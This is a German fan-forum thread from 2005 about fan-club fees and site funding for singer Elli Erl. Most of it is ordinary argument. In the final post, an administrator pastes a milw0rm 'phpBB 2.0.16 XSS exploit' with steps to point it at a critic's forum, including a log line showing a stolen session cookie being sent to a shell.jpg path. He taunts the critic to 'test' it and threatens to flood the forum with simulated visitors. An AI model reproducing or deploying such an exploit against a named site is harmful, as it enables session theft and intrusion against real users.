Du hast bestimmt bemerkt, dass das Wort Rubrik von mir fehl am Platze war. Sicherlich können Nicht-Fanclub-Mitglieder die ganze Rubrik aufrufen, aber kein einziges gepostetes Bild ansehen.

Danke, den Tipp mit den Links zur Datenbank zwecks Kommentierung haben ich und andere schon angewendet.
http://forum.elli-e.de/showthread.php?p=61358#post61358

Dennoch ist es nicht mehr möglich, jeden Schnipsel, der es aber nicht verdient, in der Datenbank zu landen, zu posten bzw. anzusehen.
Zunächst mal ein kleiner Verbesserungsvorschlag die URL in meinem Beispiel fand ich besser als die, die in dem Posting verwendet wurde.. denn wenn man
http://www.elli-e.de/index.php?OpenD...dbdisp&id=1137
benutzt stat des show.php bekommt man gleichzeitig auch noch ein paar Informationen zum Bild mit angezeigt

Nun zu den Schnipseln.. wenn Besucher nicht jeden Schnipsel an Informationen sehen, kann man also sagen das die natürliche Motivation eines Fans der alles wissen möchte und den Weg hierher gefunden hat dazu führen könnte das man doch Mitglied werden möchte um wirklich alles zu sehen und auch in den Genuss der FC-only Features zu kommen.. das ist ja keineswegs schlecht.

Letzlich finde ich ist die Menge an frei zugänglichem Content, immernoch gross genug (90%?) .. evtl sogar schon fast zu gross ist.. ich persoenlich finde das wenn wir weitere neue Features einführen uns schon deutlich eher auf zahlende Kunden fixieren sollten, denn diese sind es denen wir (alle) es ja verdanken wenn diese Seite überhaupt weiterbesteht.

Oh und wo wir ja schon wieder bei dem elendigem Thema der finanzierung / Features für Kunden sind.. ich stimme Schimmi im gewissen Sinne zu das es durchaus nicht so besonders toll ist die finanzierung der Seite direkt über den FC laufen zu lassen - das ist aber eine Sache auf die wir nun wirklich absolut gar keinen Einfluss haben und da uns keine andere Möglichkeit bleibt als das entweder so zu finanzieren oder den Stecker zu ziehen, wird das auch so weiterlaufen, bis sich entweder die Marktlage grundlegend ändert oder sich eine andere Finanzierungsmöglichkeit eröffnet.

Zitat:
Zitat von Elli live Fan
Fakt ist, dass z.B. vor Kurzem zwei Termine ( 06.07 2005 Schauspielhaus Düsseldorf (unplugged) und 07.07.2005 Bochum Total 18.15 Uhr unplugged Bühne )auf der Startseite unter "Nächster Auftritt" http://www.elli-e.de/index.php?OpenDocument=home
einfach unter den Tisch fielen, statt dessen immer der alte CSD Termin erwähnt wurde.
Allerdings konnten weiterforschende Besucher diese Termine selbstverständlich unter der Terminauflistung finden.
Bei meinen Bemühungen, Informationen über Auftritte zu bekommen, haben sich oft nette wechselseitige E-mail Kontakte ergeben. So freuen sich die Partner am anderen Ende der Leitung über ein Bewerben ihrer Veranstaltung, bei denen Elli zu Gast ist. Oft wird meine Bitte um gleichzeitige Reklame für Elli und diese Page tatkräftig unterstützt. Die Veranstalter würden es bestimmt gerne sehen, auch auf der Startseite Beachtung zu finden.
Ich kann da eigentlich nur nochmal wiederholen was ich schon beim letzten mal sagte, wenn die Verträge unterschrieben sind und der Termin offiziell ist und uns der Veranstalter oder Elli/Management über den Termin unterrichtet hat können wir sowas auch abdrucken.

Was bei dem Termin im Einzelfall gewesen ist kann ich nicht sagen, vielleicht will ja Peter das beantworten. (ich habs mal dick geschrieben damit er es liest *g*)

Zitat:
Zitat von Elli live Fan
Ich denke mal, dass für die mangelnde Kommunikation alle beteiligten Partner verantwortlich sind. Aber bei der einzigen offiziellen Elli-Homepage wäre ein gelegentliches Miteinander bestimmt förderlich.
Tja an uns solls nicht liegen..

Zitat:
Zitat von Elli live Fan
1. Renommée
Ich halte diese Klassifizierung von Mitgliedern für überflüssig, Sie dient nur dem Schüren von Intrigen und Machtkämpfen.
Sie ist in ihrer Aussagekraft sowieso völlig unglaubwürdig, da die Möglichkeit der Manipulation unschwer an dem hiesigen Führenden und seinem Pendant dazu als Schlusslicht zu erkennen ist.
1) Das mit dem hiesig Führenden bezieht sich wohl auf Peter.. nun das Administratoren sich nicht durch solche Skalen messen lassen und das man das getrosst ignorieren kann ist wohl in ziemlich vielen Foren so. ich hab meines noch nicht verändert.. sollt ich aber vielleicht gleich mal tun, paar gruene Kaestchen mehr sähen sicher gut aus

2) Wenn ich bei ihm drauf zeige steht da "Peter geniesst hohes ansehen" ich find das sogar passend, denn angesichts der Tatsache wieviel er fuer die Scene hier macht und wieviel ihm bzw seiner Firma der Spass schon gekostet hat denke ich ist das absolut korrekt und gerechtfertigt.

3) Man kann das Feature auch positiv sehen, es ist eine Anregung Beiträge zu schreiben die positiv bewertet werden. Neue Besucher freuen sich sicherlich wenn sie die intelligenten, sachlichen, informativen Postings direkt identifizieren können ohne danach suchen zu müssen.

4) Wem es nicht gefällt kanns einfach als Spielerei ignorieren.. Ich kenne einige Boards auf dem fleissig bewertet wird wo die Bewertung teilweise wirklich etwas über die Qualität aussagt und ich kenne andere in denen ich evtl. eher nicht mit der Bewertung übereinstimme und ich das mehr als Spielerei sehe.. in solchen Fällen irgnoriert man das eben.

Ich kenne sogar einige Boards in denen Postings die einen bestimmten negativen Wert an Bewertungen bekommen haben automatisch ausgeblendet werden.. Das find ich schon wieder ziemlich krass.. generell ist mir das Feature aber ziemlich egal, benutzt wird es hier ja sowieso nicht sehr stark insofern hab also auch keine wirkliche Meinung dazu.

5) Wer ist das Schlusslicht?

Zitat:
Zitat von Elli live Fan
2. FC-Kontrollzentrum
Wozu dient die Hinterlegung der Daten und wer kann sie außer mir einsehen?
Die Seite brauch die Daten um die Fanclubausweise anzuzeigen, damit man die ausdrucken kann und abgesehen davon sinds halt schlichtweg Kundendaten.. wer die sonst noch einsehen kann.. die Betreiber natürlich (sprich: wir) und sonst keiner - sollte auch logisch sein, Datenschutz bei Kundendaten ist selbstverständlich.

Geändert von Mikey (15.07.2005 um 21:33 Uhr)
  #23  
Alt 15.07.2005, 21:01
Benutzerbild von Mikey
Mikey Mikey ist offline
Administrator
 
Registrierungsdatum: 11.2003
Ort: Saturn
Beiträge: 110
Mikey ist zur Zeit noch ein unbeschriebenes Blatt
..und noch den zweiten Teil der Antwort nachgeschoben, denn sogar als Admin ist man durch die maximal Anzahl an Zeichen pro Posting und die maximal Anzahl an Smileys pro Posting limitiert, gah..

Zitat:
Zitat von Elli live Fan
Ich finde, es wäre ein tolles Signal menschlicher Größe von Seiten der Administration, den Usern hier auch bei den Fanclub-Beiträgen entgegenzukommen.
Ist nicht der Spatz in der Hand wertvoller als die Taube auf dem Dach? Lieber viele kleine Beitragszahlungen, als zu wenig Große?
1) 12 € pro Jahr entsprechen 1 € pro Monat. Das ist aus meiner Sicht billig genug. Ich will das mal so in den Raum stellen (meiner private Meinung dazu), wer sich wirklich "Fan" nennt dem sollte es das auch wert sein. Ich war heut im Eiskaffee und habn Eis gegessen und was dazu getrunken - das war teurer - der Spass hat angehalten für 20 Minuten. Unsere FC Produkte hier sind billiger und man kann damit quasi ein ganzes Jahr über Spass haben.

Ganz zu schweigen das es uns mehr Arbeit macht die Seite hier aufzubauen und zu pflegen als es Arbeit macht ein Eis zu produzieren.. (hmm, wo ich gerade so drüber nachdenke.. vielleicht sollten wir die Seite einfach dichtmachen und Eis produzieren stattdessen, bringt mehr ein und man kann sich auch mal ab und an eines gönnen *g* jaja, das warn Scherz..)

2) Ich denke nicht das es die Marktlage momentan zulassen würde, oder haben sich die Fans in letzter Zeit sprunghaft vermehrt?
Zitat:
Zitat von Elli live Fan
Ich würde es unter dem Aspekt der Kundenfreundlichkeit echt begrüßen, wenn es in diesem und/oder den anderen Punkten zu einen "Reset" käme, im Interesse der Homepage, der noch vorhandenen Fans, bzw. derer, die undercover das ganze Procedere aus der Distanz beobachten und der Künstlerin.
Man kann keine Verträge so einfach "Reseten" Ausserdem sind die momentan FC Angebote Fair.

Es gibt eigentlich auch keinen Grund das "Procedere aus der Distanz" zu betrachten, wer abwartet obwohl er eigentlich schon weiterhin Interesse hat schadet auch eher der Sache und trägt mit dazu bei das wir den Service evtl. beenden müssen.. man muss sich da auch keine Sorgen um seinen Beitrag machen, denn wie wir ja in der Ankündigung schrieben werden zuviel gezahlte Beiträge sollten wir den Service beenden anteilig zurueckgezahlt.. man kann also nicht verlieren sondern eigentlich nur gewinnen wenn einem der Content den wir hier bieten wichtig ist.

Zitat:
Zitat von Elli live Fan
Ansonsten kann ich nur hoffen, dass Elli aus den USA schon eine neue Fangemeinde mitbringt, oder bald einen Riesenhit landet, sodass der Fanpool mit neuen Kräften aufgefüllt wird.
Dem schliess ich mich so an Denn genau das ist es wovon alles abhängt.

Geändert von Mikey (15.07.2005 um 21:43 Uhr)
  #24  
Alt 15.07.2005, 23:21
Benutzerbild von Elli live Fan
Elli live Fan Elli live Fan ist offline
Registrierter Benutzer
 
Registrierungsdatum: 04.2004
Ort: Dortmund
Beiträge: 5.279
Elli live Fan befindet sich auf einem aufstrebenden Ast
Zitat:
Zitat von Mikey
Und ich schreib mich immernoch ohne "c"
Oh, ich bitte um Entschuldigung für den Schreibfehler. Hab's noch korrigiert, sah vom Schriftbild her echt nicht gut aus.

Elli live Fan
__________________
Aktuelle Informationen über Elli Erl findet ihr nur im neuen Forum auf der offiziellen Homepage
www.elli-e.com

Elli Tour und TV







  #25  
Alt 17.07.2005, 17:53
Benutzerbild von sbs
sbs sbs ist offline
Registrierter Benutzer
 
Registrierungsdatum: 02.2004
Ort: Fürth (Bayern)
Alter: 65
Beiträge: 85
sbs befindet sich auf einem aufstrebenden Ast
Interessante Diskussion hier... ich möchte dazu auch mal was sagen, und das ist jetzt die Meinung eines Menschen, der selber eine Homepage samt Forum für eine Sängerin betreibt und hier bei Elli ein "Aussenstehender" ist, der aus großem Interesse an Elli zwar regelmäßig, aber nicht gerade ausgiebig 'rein schaut.

Ich finde, dass die Administration hier einen ganz falschen Ansatz verfolgt. Ihr verwechselt so eine Künstler/innen-Internetpräsenz mit einem wirtschaftlichen Betrieb. Hier geht es doch nicht darum, Kunden anzuwerben, die Produkte "kaufen" und damit die Kosten des Betriebs decken. Genau so sieht das aber aus, wenn ich die offiziellen Postings zu diesem Thema lese. Ihr solltet die Fans nicht als Kunden betrachten, sondern als (sehr wichiges) PR-Medium für Elli, das gehegt und gepflegt werden muss - das heisst, so viele wie möglich mit attraktivem Content anzuziehen und darauf zu bauen, dass sie langfristig bleiben und selber weitere Besucher/innen durch Mundpropaganda hierher führen.

Der Ansatz, für Engagement einen finanziellen Beitrag zu fordern, der auch noch mit steigendem Enagement höher wird, ist widersinnig und kontraproduktiv. Und auch die Vergleiche mit Eis-Essen etc. hinken, weil es hier eben NICHT um ein käufliches Produkt geht, sondern um Emotionen. Die Besucher/innen dieser Homepage kommen nicht zum Einkaufen hierher - sie werden von ihrer Begeisterung für eine Künstlerin geleitet und wollen was über sie erfahren und mit Gleichgesinnten in Kontakt treten. Und das sollte grundsätzlich offen und ohne finanzielle Barrieren möglich sein. Es mag Menschen geben, die auch bereit sind, dafür was zu zahlen, aber die Mehrheit fühlt sich dadurch sicherlich vor den Kopf gestoßen.

Ebenso finde ich das permanente Gejammer der Administration über die gar so hohen Kosten völlig deplatziert. Bezahlt ihr echt Programmierer für das Forum? Oder wie soll ich die Bemerkung von Mikey verstehen, "...die lassen sich auch gut dafür bezahlen...". Wer heute eine Homepage samt Forum betreibt und ausser der Miete für's Web-Hosting sonst noch Kosten hat, macht irgendwas falsch. Erstens ist die ganze erforderliche Software - in beachtlicher Qualität - heute frei erhältlich. Und zweitens finden sich in einer Fangemeinde IMMER hochmotivierte Menschen, die die erforderliche Arbeit gerne ehrenamtlich machen. Dazu in der Regel auch noch in größerem Umfang und besserer Qualität als jemand, der das als bezahlten Job macht.

Also ich weiss echt nicht, wo diese angebliche Finanzkrise herkommen sollte... vielleicht sollte die Administration erst mal schauen, an welchen Stellen sie selbst unwirtschaftlich arbeitet, bevor hier zur Kasse gebeten und gar mit Drohungen der Schliessung gearbeitet wird. Was an Kosten übrig bleibt, wenn mal alle unnötigen Ausgaben beseitigt sind, ist so niedrig, dass das locker sogar aus privater Tasche gezahlt werden kann. Und auch dafür würden sich dann erfahrungsgemäß Menschen finden, die das gerne übernehmen.

Denkt einfach mal drüber nach...
Ciao... Sven
__________________
[URL]http://www.rawol.com/[/URL]

Geändert von sbs (17.07.2005 um 22:07 Uhr)
  #26  
Alt 17.07.2005, 22:00
Benutzerbild von Flyin FoX
Flyin FoX Flyin FoX ist offline
Registrierter Benutzer
 
Registrierungsdatum: 12.2004
Ort: NYC
Alter: 37
Beiträge: 2.139
Flyin FoX befindet sich auf einem aufstrebenden Ast
Flyin FoX eine Nachricht über ICQ schicken
Suuuuuuuuuper Steffi, endlich mal eine die hier ein Machtwort spricht, wie die Lage ausschaut oder verbessert werden kann..
Klasse!!! Danke!!!!!!!!!!
__________________
[COLOR=Lime]Don't be too weak, to be a freak!!![/COLOR]

  #27  
Alt 17.07.2005, 22:10
Benutzerbild von sbs
sbs sbs ist offline
Registrierter Benutzer
 
Registrierungsdatum: 02.2004
Ort: Fürth (Bayern)
Alter: 65
Beiträge: 85
sbs befindet sich auf einem aufstrebenden Ast
Gern geschehen! Ich muss allerdings hinzufügen, dass das Posting nicht von Steff selbst war, sondern von mir - ihrem Webmaster Sven. Sorry, das war wirklich nicht klar ersichtlich... drum habe ich jetzt nachträglich noch "Ciao... Sven" drunter geschrieben, damit's künftig keine Verwechslungen mehr gibt.
__________________
[URL]http://www.rawol.com/[/URL]
  #28  
Alt 17.07.2005, 22:21
Benutzerbild von Flyin FoX
Flyin FoX Flyin FoX ist offline
Registrierter Benutzer
 
Registrierungsdatum: 12.2004
Ort: NYC
Alter: 37
Beiträge: 2.139
Flyin FoX befindet sich auf einem aufstrebenden Ast
Flyin FoX eine Nachricht über ICQ schicken
Sorry....dann hald danke dir Sven
__________________
[COLOR=Lime]Don't be too weak, to be a freak!!![/COLOR]

  #29  
Alt 18.07.2005, 02:42
Benutzerbild von Mikey
Mikey Mikey ist offline
Administrator
 
Registrierungsdatum: 11.2003
Ort: Saturn
Beiträge: 110
Mikey ist zur Zeit noch ein unbeschriebenes Blatt
Zitat:
Zitat von sbs/sven
Ich finde, dass die Administration hier einen ganz falschen Ansatz verfolgt. Ihr verwechselt so eine Künstler/innen-Internetpräsenz mit einem wirtschaftlichen Betrieb. Hier geht es doch nicht darum, Kunden anzuwerben, die Produkte "kaufen" und damit die Kosten des Betriebs decken. Genau so sieht das aber aus, wenn ich die offiziellen Postings zu diesem Thema lese. Ihr solltet die Fans nicht als Kunden betrachten, sondern als (sehr wichiges) PR-Medium für Elli, das gehegt und gepflegt werden muss - das heisst, so viele wie möglich mit attraktivem Content anzuziehen und darauf zu bauen, dass sie langfristig bleiben und selber weitere Besucher/innen durch Mundpropaganda hierher führen.
Offenbar hast du das in den vorangegangenen Antworten nicht verstanden, solange nicht die Seite über das Management finanziert wird müssen wir das eben so finanzieren, das ist etwas das nicht in unserem Einflussbereich liegt.

Zitat:
Zitat von sbs/sven
Der Ansatz, für Engagement einen finanziellen Beitrag zu fordern, der auch noch mit steigendem Enagement höher wird, ist widersinnig und kontraproduktiv. Und auch die Vergleiche mit Eis-Essen etc. hinken, weil es hier eben NICHT um ein käufliches Produkt geht, sondern um Emotionen. Die Besucher/innen dieser Homepage kommen nicht zum Einkaufen hierher - sie werden von ihrer Begeisterung für eine Künstlerin geleitet und wollen was über sie erfahren und mit Gleichgesinnten in Kontakt treten. Und das sollte grundsätzlich offen und ohne finanzielle Barrieren möglich sein. Es mag Menschen geben, die auch bereit sind, dafür was zu zahlen, aber die Mehrheit fühlt sich dadurch sicherlich vor den Kopf gestoßen.
Tjo für dich mag das so sein, für mich handelt es sich hier letztlich aber trozdem nur um ein Produkt, eines in das wir schon viel Zeit und Geld investiert haben. Sicherlich magst du recht haben das es sinnvoller wär die sache als PR finanzieren zu lassen, aber wie ich schon oben sagte liegt diese Entscheidung nicht bei uns (s.o.).

Zitat:
Zitat von sbs/sven
Ebenso finde ich das permanente Gejammer der Administration über die gar so hohen Kosten völlig deplatziert. Bezahlt ihr echt Programmierer für das Forum? Oder wie soll ich die Bemerkung von Mikey verstehen, "...die lassen sich auch gut dafür bezahlen...".
Die Bemerkung stammt aus der Antwort zu einem Absatz wo es darum ging was gut gefällt.. und da wir die Foren Software nicht selber programmiert haben sondern per Lizenz erworben haben - ja für Geld logischerweise - war der Hinweis angebracht.

Ulkig aber das die Frage von Dir kommt.. wo du doch sagst selber schon erfahren im Webhosting bereich zu sein, denn genaugenommen steht der Name der Foren Software unter jeder Seite deutlich drunter und jeder der wirklich schonmal Foren Betrieben hat und sich ernsthaft mit Foren Software beschäftigt hat müsste zumindest schonmal von vBulletin gehört haben, zumal das sicherlich eine der bekanntesten Forenlösungen ist, mal von phpBB abgesehen, welches ja mehr für seine Exploitbarkeit bekannt ist als alles andere

Und bevor Du mir jetzt das Gegenteil "behaupten" willst, da Du ja offenbar selber phpBB auf deiner Seite benutzt.. der letzte lustige remote exploit fürs phpBB der mal wieder (..) volle Webserver Rechte vergibt ist auch noch keinen Monat alt, hoffentlich hast Du schon gepatched..

Zitat:
Zitat von sbs/sven
Und zweitens finden sich in einer Fangemeinde IMMER hochmotivierte Menschen, die die erforderliche Arbeit gerne ehrenamtlich machen. Dazu in der Regel auch noch in größerem Umfang und besserer Qualität als jemand, der das als bezahlten Job macht.
Jo nette Behauptung, faktisch siehts aber so aus das mir noch keine Elli Homepage begegnet ist die auch nur annähernd an die von uns gebotene Qualität kommt - das soll jetzt nicht als Kritik an den diversen existierenden Seiten missverstanden werden.

Zitat:
Zitat von sbs/sven
Was an Kosten übrig bleibt, wenn mal alle unnötigen Ausgaben beseitigt sind, ist so niedrig, dass das locker sogar aus privater Tasche gezahlt werden kann. Und auch dafür würden sich dann erfahrungsgemäß Menschen finden, die das gerne übernehmen.
Sicherlich kann man wenn man an der Qualität sparrt auch Geld einsparen, das steht völlig ausser Zweifel, ist hier aber nicht Diskutabel, es gibt genug andere Seiten die das machen.

Geändert von Mikey (18.07.2005 um 03:40 Uhr)
  #30  
Alt 18.07.2005, 15:22
Benutzerbild von Peter
Peter Peter ist offline
Administrator
 
Registrierungsdatum: 11.2003
Ort: Tokio
Alter: 46
Beiträge: 1.344
Peter genießt hohes AnsehenPeter genießt hohes AnsehenPeter genießt hohes AnsehenPeter genießt hohes AnsehenPeter genießt hohes AnsehenPeter genießt hohes AnsehenPeter genießt hohes AnsehenPeter genießt hohes AnsehenPeter genießt hohes AnsehenPeter genießt hohes AnsehenPeter genießt hohes Ansehen
Peter eine Nachricht über Skype™ schicken
nachdem die letzten 10 postings nichts mit der eigentlichen umfrage zu tun haben ("Was soll verbessert werden") wurden diese verschoben.


Und lieber SBS, hier gleich was für dich - funktioniert auch mit deinem Forum


Code:
/*
1) Change milw0rm.com to stefanie-nerpel.com
2) Post the below code into a new message.

Example Output:
***.**.***.*** - - [17/Jul/2005:03:09:13 -0500] 
"GET /cgi-bin/shell.jpg?phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%223%22%3B%7D;%20phpbb2mysql_sid=898eeaa6ea3c9848a60121d3450a1287;%20phpbb2mysql_t=a%3A1%3A%7Bi%3A3%3Bi%3A1120845509%3B%7D HTTP/1.1" 404 305 "http://tester/phpBB2/viewtopic.php?t=3"

/str0ke
*/


******************************************************************************************************
*					CCTEAM PhpBB 2.0.16 XSS EXPLOIT                              *
*                                           Powered by D|ablo CCTEAM                                 *
******************************************************************************************************
www.ut'

******************************************************************************************************
*				               http://ccteam.ru/                                     *
*                                             http://defacers.ru/                                    *
******************************************************************************************************
# milw0rm.com [2005-07-16]
viel spass beim testen

Achja, es gibt da noch so eine Klitzekleinigkeit und die heisst Zugriffszahlen

während deine seite da schon 16000 Besucher hatte, schafft das Elli an 2 guten Tagen (und da kündigt dir jeder Provider, lies dir mal die AGBs deines Providers durch: ich zitiere hier an der Stelle):

Zitat:
13.6
Der Kunde ist verpflichtet, seine Internet-Seite so zu gestalten, dass eine übermäßige Belastung des Servers, z.B. durch CGI-Skripte, die eine hohe Rechenleistung erfordern oder überdurchschnittlich viel Arbeitsspeicher beanspruchen, vermieden wird. Schlund + Partner ist berechtigt, Seiten, die den obigen Anforderungen nicht gerecht werden, vom Zugriff durch den Kunden oder durch Dritte auszuschließen. Schlund + Partner wird den Kunden unverzüglich von einer solchen Maßnahme informieren. Schlund + Partner wird die betreffenden Seiten wieder zugänglich machen, wenn der Kunde Schlund + Partner nachweist, dass die Seiten so umgestaltet wurden, dass sie den obigen Anforderungen genügen.
Foren, php-gästebücher verbraten eine ganze Menge an "power". (wir simulieren dir gerne 100 permanete Besucher in deinem Forum, dann wirst du sehen was solche Angebote wert sind.
Solltest du dich mehr für dieses Thema interessieren schau dir diverse Hostingseiten an, warum die Webhoster manch Kunden kündigen.

Es besteht nunmal doch (und vielleicht mag das auch ein Indiz für die Qualität unserer Seite sein) ein Unterschied zwischen DSDS2-Gewinnerin Ellis "Besucherzahlen), die eine relativ starke Medienpräsenz hatte bzw. wahrscheinlich auch wieder haben wird (im Hinblick auf Onkel Stein), und dem kleinen Sternchen Steffi Nerpel, von dem ich noch nie was gehört habe, die aber ganz vernünftig singt. Da ergeht noch der Hinweis das die Songs auf deiner Seite Gema/GVU pflichtig sind..aber ich denke das ist alles angemeldet.
__________________
http://www.elli-e.de/pictures/falsch.jpg
Dir ist Langweilig ?¿? Du willst Party ?¿? Schicke eine Sms mit dem Kennwort 'Feuer' an die 112 und innerhalb von 5 Minuten stehen 20 Männer mit lustigen Partyhüten , Sirenen und Partywagen vorm Haus
http://www.youtube.com/watch?v=3qAM2zRE3GI

Geändert von Peter (18.07.2005 um 17:17 Uhr)
Thema geschlossen

Themen-Optionen
Ansicht Thema bewerten
Thema bewerten:

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist An.
Smileys sind An
[IMG] Code ist An
HTML-Code ist An

Gehe zu


Alle Zeitangaben in WEZ +2. Es ist jetzt 23:54 Uhr.


Powered by vBulletin Version 3.8.4 (Deutsch)
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
(c) 2003-2017 PSR Netsolutions